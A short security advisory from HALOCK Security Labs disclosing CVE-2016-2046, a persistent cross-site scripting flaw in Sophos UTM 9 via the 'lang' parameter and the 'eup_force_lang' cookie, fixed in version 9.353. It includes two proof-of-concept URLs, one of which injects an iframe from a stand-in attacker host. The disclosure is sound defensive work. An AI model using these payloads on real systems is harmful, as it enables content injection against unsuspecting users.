Title: CVE-2016-2046 – CROSS SITE SCRIPTING IN SOPHOS UTM 9
Product: Sophos UTM 9
Version: 9.350-12 with pattern version 92405 (potentially lower)
Vendor Notified Date: December 14, 2015
Vendor Resolved Date: December 18, 2015
Release Date: January 28, 2016
Authentication: Not Required
Exploit steps for proof-of-concept:
- A pop-up box is displayed as a result of the payload being executed.
- Reproduction URL: https://XXX.XXX.XXX.XXX/?lang=english”;alert(‘xss’);//
- Reproduction URL: https://vulnerablehost.com/?lang=english%22;</script><iframe width%3d800 height%3d600 src%3dhttp://attackersite.com/html_injection_content.html></iframe><!–//
- Typically this would all be considered Reflected XSS, however, once one of the PoC links above is visited by the targeted user, the data passed via the ‘lang’ parameter is stored in a local cookie file named ‘eup_force_lang’ on the user’s machine. Once the cookie is set, the user no longer needs to visit the malicious crafted links discussed before. The cookie data is injected into the page automatically. This persists until the cookie is cleared from the browser.
UTM 9.353 was officially announced and released on January 28, 2016 which includes a fix to address this vulnerability.
HALOCK Security Labs